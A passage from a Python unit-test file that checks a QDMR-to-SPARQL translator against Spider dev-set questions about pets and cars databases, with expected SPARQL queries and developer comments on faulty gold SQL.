grounding[GroundingIndex(3,0,"weight of #REF")] = GroundingKey.make_column_grounding("Pets", "weight")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev53(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 53
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Find the number of dog pets that are raised by female students (with sex F).
# SQL is wrong:
# SELECT count(*)
# FROM student AS T1 JOIN has_pet AS T2 ON T1.stuid = T2.stuid JOIN pets AS T3 ON T2.petid = T3.petid
# WHERE T1.sex = 'F' AND T3.pettype = 'dog'
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program
# 1: SELECT['students']
# 2: FILTER['#1', 'that are female']
# 3: PROJECT['dog pets raised by #REF', '#2']
# 4: GROUP['count', '#3', '#2']
# 5: AGGREGATE['sum', '#4']
grounding = {}
grounding[GroundingIndex(0,0,"students")] = GroundingKey.make_table_grounding("Student")
grounding[GroundingIndex(1,1,"that are female")] = GroundingKey.make_comparative_grounding("=", "F", GroundingKey.make_column_grounding("Student", "Sex"))
grounding[GroundingIndex(2,0,"dog pets raised by #REF")] = GroundingKey.make_value_grounding("Pets", "PetType", "dog")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
# class TestSpiderDev59(unittest.TestCase):
# @timeout(ONE_TEST_TIMEOUT)
# def test_spider_dev(self):
# """Test an entry from spider dataset
# """
# split_name = "dev"
# i_query = 59
# db_id = get_db_id(split_name, i_query)
# rdf_graph, schema = get_graph_and_schema(split_name, db_id)
# sql_query = get_sql_query(split_name, i_query)
# # question: Find the first name of students who have both cat and dog pets
# # SQL:
# # select t1.fname
# # from student as t1 join has_pet as t2 on t1.stuid = t2.stuid join pets as t3 on t3.petid = t2.petid
# # where t3.pettype = 'cat'
# # intersect
# # select t1.fname
# # from student as t1 join has_pet as t2 on t1.stuid = t2.stuid join pets as t3 on t3.petid = t2.petid
# # where t3.pettype = 'dog'
# # This SPARQL query looks correct but does not work because the intersection of two filters is the empty set.
# # What to do with it?
# correct_sparql_query = textwrap.dedent("""\
# SELECT ?Fname
# WHERE
# {
# {
# SELECT ?Student
# WHERE
# {
# {
# SELECT ?Student
# WHERE
# {
# ?StuID arc:Has_Pet:StuID:Student:StuID ?Student.
# ?Has_Pet arc:Has_Pet:StuID ?StuID.
# ?Has_Pet arc:Has_Pet:PetID:Pets:PetID ?Pets.
# ?Pets arc:Pets:PetType ?PetType.
# FILTER(?PetType = "cat").
# }
# GROUP BY ?Student
# }
# ?StuID_1 arc:Has_Pet:StuID:Student:StuID ?Student.
# ?Has_Pet_1 arc:Has_Pet:StuID ?StuID_1.
# ?Has_Pet_1 arc:Has_Pet:PetID:Pets:PetID ?Pets_1.
# ?Pets_1 arc:Pets:PetType ?PetType_1.
# FILTER(?PetType_1 = "dog").
# }
# GROUP BY ?Student
# }
# ?Student arc:Student:Fname ?Fname.
# }""")
# qdmr = get_qdmr_from_break(split_name, i_query)
# # break_program:
# # SELECT['students']
# # FILTER['#1', 'who have cats']
# # FILTER['#1', 'who have dog pets']
# # INTERSECTION['#1', '#2', '#3']
# # PROJECT['first names of #REF', '#4']
# grounding = {}
# grounding[GroundingIndex(0,0,"students")] = GroundingKey.make_table_grounding("Student")
# grounding[GroundingIndex(1,1,"who have cats")] = GroundingKey.make_comparative_grounding('=', 'cat', GroundingKey.make_column_grounding("Pets", "PetType"))
# grounding[GroundingIndex(2,1,"who have dog pets")] = GroundingKey.make_comparative_grounding('=', 'dog', GroundingKey.make_column_grounding("Pets", "PetType"))
# grounding[GroundingIndex(4,0,"first names of #REF")] = GroundingKey.make_column_grounding("Student", "Fname")
# sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
# result_correct = QueryResult.execute_query_sql(sql_query, schema)
# result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
# equal, message = result.is_equal_to(result_correct,
# require_column_order=True,
# require_row_order=False,
# return_message=True)
# self.assertTrue(equal, message)
class TestSpiderDev71(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 71
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Find the average and maximum age for each type of pet.
# SQL is wrong: SELECT pettype , avg(pet_age) , max(pet_age) FROM pets GROUP BY pettype
correct_sparql_query = textwrap.dedent("""\
SELECT ?PetType ?avg ?max
WHERE
{
{
SELECT ?PetType (avg(?pet_age) AS ?avg)
WHERE
{
?Pets arc:Pets:PetType ?PetType.
?Pets arc:Pets:pet_age ?pet_age.
}
GROUP BY ?PetType
}
{
SELECT ?PetType (max(?pet_age_1) AS ?max)
WHERE
{
?Pets_1 arc:Pets:PetType ?PetType.
?Pets_1 arc:Pets:pet_age ?pet_age_1.
}
GROUP BY ?PetType
}
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program
# #1: SELECT['pets']
# #2: PROJECT['types of #REF', '#1']
# #3: PROJECT['ages of #REF', '#2']
# #4: GROUP['avg', '#3', '#2']
# #5: GROUP['max', '#3', '#2']
# #6: UNION['#2', '#4', '#5']
grounding = {}
grounding[GroundingIndex(0,0,"pets")] = GroundingKey.make_table_grounding("Pets")
grounding[GroundingIndex(1,0,"types of #REF")] = GroundingKey.make_column_grounding("Pets", "PetType")
grounding[GroundingIndex(2,0,"ages of #REF")] = GroundingKey.make_column_grounding("Pets", "pet_age")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev97(unittest.TestCase):
# @timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 97
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Find the model of the car whose weight is below the average weight.
# SQL:
# SELECT T1.model
# FROM CAR_NAMES AS T1 JOIN CARS_DATA AS T2 ON T1.MakeId = T2.Id
# WHERE T2.Weight < (SELECT avg(Weight) FROM CARS_DATA)
# for the correct query, SPARQL generator wants to group by car_names.Model "GROUP BY ?Model",
# which leads to a different result because car_names.Model is not a key
# but this example has another error, which I want to debug: spaces in the values with keys
correct_sparql_query = textwrap.dedent("""\
SELECT ?Model
WHERE
{
{
SELECT ?car_names
WHERE
{
?cars_data arc:cars_data:Id:car_names:MakeId ?car_names.
?cars_data arc:cars_data:Weight ?Weight.
{
SELECT (avg(?Weight_1) AS ?avg)
WHERE
{
?cars_data_1 arc:cars_data:Weight ?Weight_1.
}
}
FILTER(?Weight < ?avg).
}
GROUP BY ?car_names
}
?car_names arc:car_names:Model ?Model.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['cars']
# PROJECT['models of #REF', '#1']
# PROJECT['weights of #REF', '#2']
# AGGREGATE['avg', '#3']
# COMPARATIVE['#2', '#3', 'is lower than #4']
grounding = {}
grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("car_names")
grounding[GroundingIndex(1,0,"models of #REF")] = GroundingKey.make_column_grounding("car_names", "Model")
grounding[GroundingIndex(2,0,"weights of #REF")] = GroundingKey.make_column_grounding("cars_data", "Weight")
grounding[GroundingIndex(4,2,"is lower than #4")] = GroundingKey.make_comparative_grounding("<", "#4")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev100(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 100
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# SELECT DISTINCT T1.Maker
# FROM CAR_MAKERS AS T1 JOIN MODEL_LIST AS T2 ON T1.Id = T2.Maker JOIN CAR_NAMES AS T3 ON T2.model = T3.model JOIN CARS_DATA AS T4 ON T3.MakeId = T4.id
# WHERE T4.year = '1970';
correct_sparql_query = textwrap.dedent("""\
SELECT ?Maker_2
WHERE
{
{
SELECT ?car_makers
WHERE
{
{
SELECT ?car_makers
WHERE
{
?Maker arc:model_list:Maker:car_makers:Id ?car_makers.
?model_list arc:model_list:Maker ?Maker.
?model_list arc:model_list:Model ?Model_1.
?Model arc:car_names:Model:model_list:Model ?Model_1.
?car_names arc:car_names:Model ?Model.
}
GROUP BY ?car_makers
}
?Maker_1 arc:model_list:Maker:car_makers:Id ?car_makers.
?model_list_1 arc:model_list:Maker ?Maker_1.
?model_list_1 arc:model_list:Model ?Model_3.
?Model_2 arc:car_names:Model:model_list:Model ?Model_3.
?car_names_1 arc:car_names:Model ?Model_2.
?cars_data arc:cars_data:Id:car_names:MakeId ?car_names_1.
?cars_data arc:cars_data:Year ?Year.
FILTER(?Year = 1970).
}
GROUP BY ?car_makers
}
?car_makers arc:car_makers:Maker ?Maker_2.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['different car makers']
# FILTER['#1', 'who produced a car']
# FILTER['#2', 'in 1970']
# PROJECT['the name of #REF', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"different car makers")] = GroundingKey.make_table_grounding("car_makers")
grounding[GroundingIndex(1,1,"who produced a car")] = GroundingKey.make_table_grounding("car_names")
grounding[GroundingIndex(2,1,"in 1970")] = GroundingKey.make_value_grounding("cars_data", "Year", "1970")
grounding[GroundingIndex(3,0,"the name of #REF")] = GroundingKey.make_column_grounding("car_makers", "Maker")
grounding["distinct"] = ["#1"]
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_change_filter_to_comparative(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 100
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# SELECT DISTINCT T1.Maker
# FROM CAR_MAKERS AS T1 JOIN MODEL_LIST AS T2 ON T1.Id = T2.Maker JOIN CAR_NAMES AS T3 ON T2.model = T3.model JOIN CARS_DATA AS T4 ON T3.MakeId = T4.id
# WHERE T4.year = '1970';
correct_sparql_query = textwrap.dedent("""\
SELECT ?Maker_2
WHERE
{
{
SELECT ?car_makers
WHERE
{
{
SELECT ?car_makers
WHERE
{
?Maker arc:model_list:Maker:car_makers:Id ?car_makers.
?model_list arc:model_list:Maker ?Maker.
?model_list arc:model_list:Model ?Model_1.
?Model arc:car_names:Model:model_list:Model ?Model_1.
?car_names arc:car_names:Model ?Model.
}
GROUP BY ?car_makers
}
?Maker_1 arc:model_list:Maker:car_makers:Id ?car_makers.
?model_list_1 arc:model_list:Maker ?Maker_1.
?model_list_1 arc:model_list:Model ?Model_3.
?Model_2 arc:car_names:Model:model_list:Model ?Model_3.
?car_names_1 arc:car_names:Model ?Model_2.
?cars_data arc:cars_data:Id:car_names:MakeId ?car_names_1.
?cars_data arc:cars_data:Year ?Year.
FILTER(?Year = 1970).
}
GROUP BY ?car_makers
}
?car_makers arc:car_makers:Maker ?Maker_2.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("car_makers", "Maker"))])
qdmr = get_qdmr_from_break(split_name, i_query)
qdmr.ops[2] = "comparative"
qdmr.args[2] = ["#2", "#2", "in 1970"]
# break_program:
# SELECT['different car makers']
# FILTER['#1', 'who produced a car']
# COMPARATIVE['#2', '#2', 'in 1970']
# PROJECT['the name of #REF', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"different car makers")] = GroundingKey.make_table_grounding("car_makers")
grounding[GroundingIndex(1,1,"who produced a car")] = GroundingKey.make_table_grounding("car_names")
grounding[GroundingIndex(2,2,"in 1970")] = GroundingKey.make_comparative_grounding("=", "1970", GroundingKey.make_column_grounding("cars_data", "Year"))
grounding[GroundingIndex(3,0,"the name of #REF")] = GroundingKey.make_column_grounding("car_makers", "Maker")
grounding["distinct"] = ["#1"]
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev101(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_corrected_comparative_to_superlative(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 101
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Find the make and production time of the cars that were produced in the earliest year?
# sql_query:
# SELECT T2.Make, T1.Year
# FROM CARS_DATA AS T1 JOIN CAR_NAMES AS T2 ON T1.Id = T2.MakeId
# WHERE T1.Year = (SELECT min(YEAR) FROM CARS_DATA);'
correct_sparql_query = textwrap.dedent("""\
SELECT ?Make ?Year
WHERE
{
{
SELECT (MIN(?years) AS ?min)
WHERE
{
?cars_data_id arc:cars_data:Year ?years.
}
}
?Id arc:cars_data:Id:car_names:MakeId ?MakeId.
?MakeId arc:car_names:Make ?Make.
?Id arc:cars_data:Year ?Year.
FILTER(?Year = ?min).
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# correct Break: substitute compaartive with superlative
qdmr.ops[2] = "superlative"
qdmr.args[2] = ["is the earliest", "#1", "#2"]
# break_program:
# SELECT['cars']
# PROJECT['years #REF were produced', '#1']
# SUPERLATIVE['is the earliest', '#1', '#2'] # original - COMPARATIVE['#1', '#2', 'is the earliest']
# PROJECT['make of #REF', '#3']
# PROJECT['production time of #REF', '#3']
# UNION['#4', '#5']
grounding = {}
grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("cars_data")
grounding[GroundingIndex(1,0,"years #REF were produced")] = GroundingKey.make_column_grounding("cars_data", "Year")
grounding[GroundingIndex(2,0,"is the earliest")] = GroundingKey.make_comparative_grounding("min", None)
grounding[GroundingIndex(3,0,"make of #REF")] = GroundingKey.make_column_grounding("car_names", "Make")
grounding[GroundingIndex(4,0,"production time of #REF")] = GroundingKey.make_column_grounding("cars_data", "Year")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 101
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Find the make and production time of the cars that were produced in the earliest year?
# sql_query:
# SELECT T2.Make, T1.Year
# FROM CARS_DATA AS T1 JOIN CAR_NAMES AS T2 ON T1.Id = T2.MakeId
# WHERE T1.Year = (SELECT min(YEAR) FROM CARS_DATA);'
correct_sparql_query = textwrap.dedent("""\
SELECT ?Make ?Year
WHERE
{
{
SELECT (MIN(?years) AS ?min)
WHERE
{
?cars_data_id arc:cars_data:Year ?years.
}
}
?Id arc:cars_data:Id:car_names:MakeId ?MakeId.
?MakeId arc:car_names:Make ?Make.
?Id arc:cars_data:Year ?Year.
FILTER(?Year = ?min).
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['cars']
# PROJECT['years #REF were produced', '#1']
# COMPARATIVE['#1', '#2', 'is the earliest']
# PROJECT['make of #REF', '#3']
# PROJECT['production time of #REF', '#3']
# UNION['#4', '#5']
grounding = {}
grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("cars_data")
grounding[GroundingIndex(1,0,"years #REF were produced")] = GroundingKey.make_column_grounding("cars_data", "Year")
grounding[GroundingIndex(2,2,"is the earliest")] = GroundingKey.make_comparative_grounding("min", None)
grounding[GroundingIndex(3,0,"make of #REF")] = GroundingKey.make_column_grounding("car_names", "Make")
grounding[GroundingIndex(4,0,"production time of #REF")] = GroundingKey.make_column_grounding("cars_data", "Year")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev105(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 105
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['continents']
# PROJECT['car makers on #REF', '#1']
# GROUP['count', '#2', '#1']
# UNION['#1', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"continents")] = GroundingKey.make_column_grounding("continents", "Continent")
grounding[GroundingIndex(1,0,"car makers on #REF")] = GroundingKey.make_table_grounding("car_makers")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_delete_union_after_group(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 105
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
qdmr = get_qdmr_from_break(split_name, i_query)
# need to decide what to do with union after group by
del qdmr.ops[3]
del qdmr.args[3]
# break_program:
# SELECT['continents']
# PROJECT['car makers on #REF', '#1']
# GROUP['count', '#2', '#1']
grounding = {}
grounding[GroundingIndex(0,0,"continents")] = GroundingKey.make_column_grounding("continents", "Continent")
grounding[GroundingIndex(1,0,"car makers on #REF")] = GroundingKey.make_table_grounding("car_makers")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev108(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 108
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# sql_query:
# SELECT T2.CountryName
# FROM CAR_MAKERS AS T1 JOIN COUNTRIES AS T2 ON T1.Country = T2.CountryId
# GROUP BY T1.Country
# ORDER BY Count(*) DESC LIMIT 1
# question: What is the name of the country with the most car makers?
correct_sparql_query = textwrap.dedent("""\
SELECT ?CountryName
WHERE
{
{
SELECT (max(?count) AS ?max)
WHERE
{
{
SELECT ?countries (count(?car_makers) AS ?count)
WHERE
{
?car_makers arc:car_makers:Id ?car_makers.
?car_makers arc:car_makers:Country ?Country.
?Country arc:car_makers:Country:countries:CountryId ?countries.
}
GROUP BY ?countries
}
}
}
{
SELECT ?countries_1 (count(?car_makers_2) AS ?count_1)
WHERE
{
?car_makers_2 arc:car_makers:Id ?car_makers_2.
?car_makers_2 arc:car_makers:Country ?Country_2.
?Country_2 arc:car_makers:Country:countries:CountryId ?countries_1.
}
GROUP BY ?countries_1
}
FILTER(?count_1 = ?max).
?countries_1 arc:countries:CountryName ?CountryName.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['car makers']
# PROJECT['countries of #REF', '#1']
# GROUP['count', '#1', '#2']
# COMPARATIVE['#2', '#3', 'is the highest']
# PROJECT['the name of #REF', '#4']
grounding = {}
grounding[GroundingIndex(0,0,"car makers")] = GroundingKey.make_table_grounding("car_makers")
grounding[GroundingIndex(1,0,"countries of #REF")] = GroundingKey.make_column_grounding("countries", "CountryId")
grounding[GroundingIndex(3,2,"is the highest")] = GroundingKey.make_comparative_grounding("max", None)
grounding[GroundingIndex(4,0,"the name of #REF")] = GroundingKey.make_column_grounding("countries", "CountryName")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev110(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 110
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# sql_query:
# 'SELECT Count(*) , T2.FullName , T2.id
# FROM MODEL_LIST AS T1 JOIN CAR_MAKERS AS T2 ON T1.Maker = T2.Id
# GROUP BY T2.id;
# question: What is the number of car models that are produced by each maker and what is the id and full name of each maker?
# CAUTION: SQL query has incorrect order of arguments
correct_sparql_query = textwrap.dedent("""\
SELECT ?count ?car_makers ?FullName
WHERE
{
{
SELECT ?car_makers (count(?model_list) AS ?count)
WHERE
{
?car_makers arc:car_makers:Id ?car_makers.
?Maker arc:model_list:Maker:car_makers:Id ?car_makers.
?model_list arc:model_list:Maker ?Maker.
}
GROUP BY ?car_makers
}
?car_makers arc:car_makers:FullName ?FullName.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.add_aggregator(OutputColumnId.from_grounding(GroundingKey.make_table_grounding("model_list"), schema), "count"),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("car_makers", "Id")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("car_makers", "FullName"))])
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program
# SELECT['car makers']
# PROJECT['car models of #REF', '#1']
# GROUP['count', '#2', '#1']
# PROJECT['ids of #REF', '#1']
# PROJECT['full names of #REF', '#1']
# UNION['#3', '#4', '#5']
grounding = {}
grounding[GroundingIndex(0,0,"car makers")] = GroundingKey.make_table_grounding("car_makers")
grounding[GroundingIndex(1,0,"car models of #REF")] = GroundingKey.make_table_grounding("model_list")
grounding[GroundingIndex(3,0,"ids of #REF")] = GroundingKey.make_column_grounding("car_makers", "Id")
grounding[GroundingIndex(4,0,"full names of #REF")] = GroundingKey.make_column_grounding("car_makers", "FullName")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev124(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 124
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# sql_query:
# SELECT T1.CountryName , T1.CountryId
# FROM COUNTRIES AS T1 JOIN CAR_MAKERS AS T2 ON T1.CountryId = T2.Country
# GROUP BY T1.CountryId HAVING count(*) >= 1;
# question: What are the names and ids of all countries with at least one car maker?
correct_sparql_query = textwrap.dedent("""\
SELECT ?CountryName ?countries
WHERE
{
{
SELECT ?countries
WHERE
{
?Country arc:car_makers:Country:countries:CountryId ?countries.
?car_makers arc:car_makers:Country ?Country.
}
GROUP BY ?countries
}
?countries arc:countries:CountryName ?CountryName.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['countries']
# FILTER['#1', 'with car maker']
# PROJECT['names of #REF', '#2']
# PROJECT['ids of #REF', '#2']
# UNION['#3', '#4']
grounding = {}
grounding[GroundingIndex(0,0,"countries")] = GroundingKey.make_table_grounding("countries")
grounding[GroundingIndex(1,1,"with car maker")] = GroundingKey.make_table_grounding("car_makers")
grounding[GroundingIndex(2,0,"names of #REF")] = GroundingKey.make_column_grounding("countries", "CountryName")
grounding[GroundingIndex(3,0,"ids of #REF")] = GroundingKey.make_column_grounding("countries", "CountryId")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev129(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 129
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Which countries in europe have at least 3 car manufacturers?
# sql_query:
# SELECT T1.CountryName
# FROM COUNTRIES AS T1 JOIN CONTINENTS AS T2 ON T1.Continent = T2.ContId JOIN CAR_MAKERS AS T3 ON T1.CountryId = T3.Country
# WHERE T2.Continent = 'europe'
# GROUP BY T1.CountryName
# HAVING count(*) >= 3;
correct_sparql_query_long = textwrap.dedent("""\
SELECT ?CountryName
WHERE
{
?countries arc:countries:CountryName ?CountryName.
?countries arc:countries:Continent ?Continent_1.
?Continent_1 arc:countries:Continent:continents:ContId ?continents.
?continents arc:continents:Continent ?Continent.
FILTER(?Continent = "europe").
{
SELECT ?CountryName (count(?car_makers) AS ?count)
WHERE
{
?countries_1 arc:countries:CountryName ?CountryName.
?countries_1 arc:countries:Continent ?Continent_3.
?Continent_3 arc:countries:Continent:continents:ContId ?continents_1.
?continents_1 arc:continents:Continent ?Continent_2.
FILTER(?Continent_2 = "europe").
?Country arc:car_makers:Country:countries:CountryId ?countries_1.
?car_makers arc:car_makers:Country ?Country.
}
GROUP BY ?CountryName
}
FILTER(?count >= 3.0).
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['countries']
# FILTER['#1', 'in europe']
# PROJECT['car manufacturers in #REF', '#2']
# GROUP['count', '#3', '#2']
# COMPARATIVE['#2', '#4', 'is at least 3']
grounding = {}
grounding[GroundingIndex(0,0,"countries")] = GroundingKey.make_column_grounding("countries", "CountryName")
grounding[GroundingIndex(1,1,"in europe")] = GroundingKey.make_value_grounding("continents", "Continent", "europe")
grounding[GroundingIndex(2,0,"car manufacturers in #REF")] = GroundingKey.make_table_grounding("car_makers")
grounding[GroundingIndex(4,2,"is at least 3")] = GroundingKey.make_comparative_grounding(">=", "3")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
